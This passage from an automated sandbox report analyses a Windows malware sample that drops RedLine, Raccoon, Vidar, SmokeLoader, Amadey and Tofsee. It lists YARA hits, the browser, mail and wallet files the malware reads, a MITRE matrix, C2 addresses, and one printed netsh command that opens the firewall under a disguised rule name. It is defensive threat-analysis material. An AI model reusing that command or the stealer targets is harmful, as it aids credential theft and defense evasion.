                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8EC4.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00408ECC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_004017B8 SetComputerNameW,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExA,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExW,_printf,_malloc,_calloc,__wfopen_s,_fseek,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameA,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,

                          Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Modifies the windows firewall
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                          Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match | File source: 40.0.8EC4.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.8EC4.exe.451f910.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.8EC4.exe.451f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.2.8EC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected Amadeys stealer DLL
Source: Yara match | File source: 0000002C.00000002.861387374.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000003.862648627.00000000005E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.851523322.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.922320666.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.861216810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.922065268.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match | File source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000030.00000002.940319035.00000000007A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.942563144.00000000007CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.943525106.00000000007D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.934963218.0000000000751000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match | File source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match | File source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match | File source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\7801.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\7801.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\AppData\Local\Temp\7801.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp | String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | String found in binary or memory: ExodusE#
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp | String found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 8EC4.exe | String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: Yara match | File source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 8EC4.exe PID: 6240, type: MEMORYSTR

                          Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match | File source: 40.0.8EC4.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.8EC4.exe.451f910.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.8EC4.exe.451f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.2.8EC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.0.8EC4.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match | File source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match | File source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match | File source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match | File source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Code function: 36_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 39_2_003288B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Scripting1 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools211 | OS Credential Dumping1 | System Time Discovery2 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer15 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API541 | Valid Accounts1 | Valid Accounts1 | Deobfuscate/Decode Files or Information11 | Input Capture1 | Account Discovery1 | Remote Desktop Protocol | Data from Local System2 | Exfiltration Over Bluetooth | Encrypted Channel22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution1 | Windows Service14 | Access Token Manipulation1 | Scripting1 | Security Account Manager | File and Directory Discovery3 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter3 | Logon Script (Mac) | Windows Service14 | Obfuscated Files or Information3 | NTDS | System Information Discovery228 | Distributed Component Object Model | Input Capture1 | Scheduled Transfer | Non-Application Layer Protocol5 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Service Execution3 | Network Logon Script | Process Injection713 | Software Packing33 | LSA Secrets | Security Software Discovery541 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol36 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp1 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Virtualization/Sandbox Evasion331 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading131 | /etc/passwd and /etc/shadow | System Owner/User Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Valid Accounts1 | Network Sniffing | Remote System Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Access Token Manipulation1 | Input Capture | System Network Configuration Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Virtualization/Sandbox Evasion331 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Process Injection713 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement
Trusted Relationship | Python | Hypervisor | Process Injection | Hidden Files and Directories1 | Web Portal Capture | Cloud Groups | Attack PC via USB Connection | Local Email Collection | Standard Application Layer Protocol | Internal Proxy | | | Internal Defacement

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 552969 | Sample: U3E7zMaux2.exe | Startdate: 14/01/2022 | Architecture: WINDOWS | Score: 100

Graph nodes, one per line: node id, node label, then the edge from the parent node (parent->node) followed by its edge label (started, injected, dropped) where the graph carries one. Node 2 is the start node.

97  cdn.discordapp.com  2->97
99  185.215.113.35, 49901, 49902, 49904 WHOLESALECONNECTIONSNL Portugal  2->99
101  4 other IPs or domains  2->101
129  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)  2->129
131  Multi AV Scanner detection for domain / URL  2->131
133  Antivirus detection for URL or domain  2->133
137  21 other signatures  2->137
11  U3E7zMaux2.exe  2->11 started
14  lagavljy.exe  2->14 started
16  uufaeea  2->16 started
18  5 other processes  2->18
135  System process connects to network (likely due to code injection or exploit)  97->135
183  Contains functionality to inject code into remote processes  11->183
185  Injects a PE file into a foreign processes  11->185
20  U3E7zMaux2.exe  11->20 started
187  Detected unpacking (changes PE section rights)  14->187
189  Detected unpacking (overwrites its own PE header)  14->189
191  Writes to foreign memory regions  14->191
193  Allocates memory in foreign processes  14->193
23  svchost.exe  14->23 started
26  uufaeea  16->26 started
28  WerFault.exe  18->28 started
139  Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))  20->139
141  Maps a DLL or memory area into another process  20->141
143  Checks if the current machine is a virtual machine (disk enumeration)  20->143
30  explorer.exe 12  20->30 injected
103  microsoft-com.mail.protection.outlook.com 40.93.212.0, 25, 49829 MICROSOFT-CORP-MSN-AS-BLOCKUS United States  23->103
105  patmushta.info 8.209.67.104, 443, 49844 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore  23->105
145  System process connects to network (likely due to code injection or exploit)  23->145
147  Found API chain indicative of debugger detection  23->147
149  Creates a thread in another existing process (thread injection)  26->149
115  185.233.81.115, 443, 49792 SUPERSERVERSDATACENTERRU Russian Federation  30->115
117  188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands  30->117
119  13 other IPs or domains  30->119
89  C:\Users\user\AppData\Roaming\uufaeea, PE32  30->89 dropped
91  C:\Users\user\AppData\Local\Temp666.exe, PE32  30->91 dropped
93  C:\Users\user\AppData\Local\Temp\9A02.exe, PE32  30->93 dropped
95  11 other files (6 malicious)  30->95 dropped
121  System process connects to network (likely due to code injection or exploit)  30->121
123  Benign windows process drops PE files  30->123
125  Deletes itself after installation  30->125
127  Hides that the sample has been downloaded from the Internet (zone.identifier)  30->127
35  86C4.exe 2  30->35 started
39  7CA1.exe  30->39 started
41  7801.exe  30->41 started
44  3 other processes  30->44
75  C:\Users\user\AppData\Local\...\lagavljy.exe, PE32  35->75 dropped
151  Detected unpacking (changes PE section rights)  35->151
153  Detected unpacking (overwrites its own PE header)  35->153
155  Machine Learning detection for dropped file  35->155
171  3 other signatures  35->171
46  cmd.exe  35->46 started
49  cmd.exe 2  35->49 started
51  sc.exe  35->51 started
61  3 other processes  35->61
157  Found evasive API chain (may stop execution after checking mutex)  39->157
159  Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)  39->159
161  Found evasive API chain (may stop execution after checking computer name)  39->161
173  2 other signatures  39->173
109  185.163.204.24, 49916, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany  41->109
111  185.163.45.70, 80 MIVOCLOUDMD Moldova Republic of  41->111
113  185.163.204.22, 49914, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany  41->113
77  C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32  41->77 dropped
79  C:\Users\user\AppData\...\vcruntime140.dll, PE32  41->79 dropped
81  C:\Users\user\AppData\...\ucrtbase.dll, PE32  41->81 dropped
85  14 other files (none is malicious)  41->85 dropped
163  Tries to steal Mail credentials (via file / registry access)  41->163
165  Tries to harvest and steal browser information (history, passwords, etc)  41->165
83  C:\Users\user\AppData\Local\...\8EC4.exe.log, ASCII  44->83 dropped
167  Antivirus detection for dropped file  44->167
169  Injects a PE file into a foreign processes  44->169
53  E666.exe  44->53 started
56  8EC4.exe  44->56 started
59  WerFault.exe 23 9  44->59 started
87  C:\Windows\SysWOW64\...\lagavljy.exe (copy), PE32  46->87 dropped
63  conhost.exe  46->63 started
65  conhost.exe  49->65 started
67  conhost.exe  51->67 started
175  Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))  53->175
177  Maps a DLL or memory area into another process  53->177
179  Checks if the current machine is a virtual machine (disk enumeration)  53->179
181  Creates a thread in another existing process (thread injection)  53->181
107  86.107.197.138, 38133, 49908 MOD-EUNL Romania  56->107
69  conhost.exe  61->69 started
71  conhost.exe  61->71 started
73  conhost.exe  61->73 started

                          Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

